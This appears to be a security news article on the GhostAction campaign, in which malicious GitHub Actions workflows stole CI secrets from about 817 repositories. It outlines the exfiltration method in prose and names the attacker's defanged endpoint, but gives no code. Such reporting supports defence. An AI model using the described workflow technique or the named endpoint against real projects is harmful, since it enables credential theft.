A new supply chain attack targeting GitHub repositories, now identified as GhostAction, has been confirmed by GitGuardian researchers. The attack led to the theft of 3,325 secrets, exposing tokens and keys across widely used platforms including PyPI, npm, DockerHub, GitHub, AWS, and Cloudflare.
The first evidence of compromise appeared on September 2, 2025, in the popular project FastUUID. Researchers determined that the campaign was not limited to a single repository, but part of a much larger operation.
How the Attackers Compromised GitHub Repositories
The GhostAction campaign leveraged compromised maintainer accounts to insert malicious commits into legitimate projects. Attackers added a malicious GitHub Actions workflow file designed to activate automatically when a “push” occurred or through manual dispatch.
Once triggered, the workflow:
- Collected sensitive secrets from the GitHub Actions environment.
- Exfiltrated them via a curl POST request to a server controlled by the attackers at
bold-dhawan[.]45-139-104-115[.]plesk[.]page.
In the case of FastUUID, attackers managed to steal a PyPI token, though no malicious package releases were made before the compromise was remediated.
The Scope of the GhostAction Compromise
GitGuardian’s deeper investigation revealed that this was a broad supply chain campaign rather than a single-target attack. At least 817 repositories were affected, with malicious commits deployed across different projects.
- 573 repositories were directly alerted via GitHub issues opened by GitGuardian.
- 100 repositories had already detected the compromise and removed the malicious code.
- The exfiltration endpoint stopped resolving shortly after researchers exposed the campaign.
Overall, researchers estimate 3,325 secrets were stolen, including:
- PyPI tokens
- npm tokens
- DockerHub tokens
- GitHub tokens
- Cloudflare API tokens
- AWS access keys
- Database credentials
Impact on Open Source Ecosystems
The campaign compromised nine npm packages and 15 PyPI packages, raising concerns that malicious or trojanized versions could be released if the exposed secrets are not revoked.
GitGuardian highlighted the broader reach of the attack, noting:
“This analysis revealed compromised tokens across multiple package ecosystems, including Rust crates and npm packages. Several companies were found to have their entire SDK portfolio compromised, with malicious workflows affecting their Python, Rust, JavaScript, and Go repositories simultaneously.”
The incident highlights how software supply chains across ecosystems such as npm, PyPI, Rust, and Go are interconnected, meaning a single attack vector can cause cascading risks across multiple environments.
Comparison With the s1ngularity Campaign
The GhostAction campaign shows technical and operational similarities to the s1ngularity campaign that surfaced in late August 2025, which also targeted open-source ecosystems and GitHub repositories.
However, GitGuardian emphasized that it does not believe there is a direct connection between the two operations. While the tactics overlap, the researchers consider GhostAction a distinct supply chain threat.
GitHub and Ecosystem Response
On September 5, 2025, GitGuardian escalated the issue by notifying the security teams of GitHub, npm, and PyPI. The coordinated response helped mitigate the potential fallout, although the full scope of the attack remains under monitoring.
As of now, GitHub maintainers are urged to rotate exposed secrets and ensure that affected repositories revoke compromised tokens to prevent the release of malicious package updates.
Enterprise Takeaway From the GhostAction Incident
The GhostAction attack illustrates the ongoing challenges of supply chain security in open-source software ecosystems. By exploiting trusted maintainer accounts and injecting malicious workflows, attackers were able to compromise multiple repositories and extract secrets across programming languages and platforms.
For enterprises relying on open-source packages, the incident serves as a reminder that:
- GitHub Actions workflows can be manipulated to exfiltrate sensitive data.
- Secrets management and rotation policies must be enforced rigorously.
- Monitoring for unusual workflow changes is critical in preventing large-scale compromises.
With over 3,000 secrets stolen and at least 817 repositories impacted, GhostAction underscores how supply chain attacks are becoming one of the most disruptive cybersecurity threats to enterprise development pipelines.
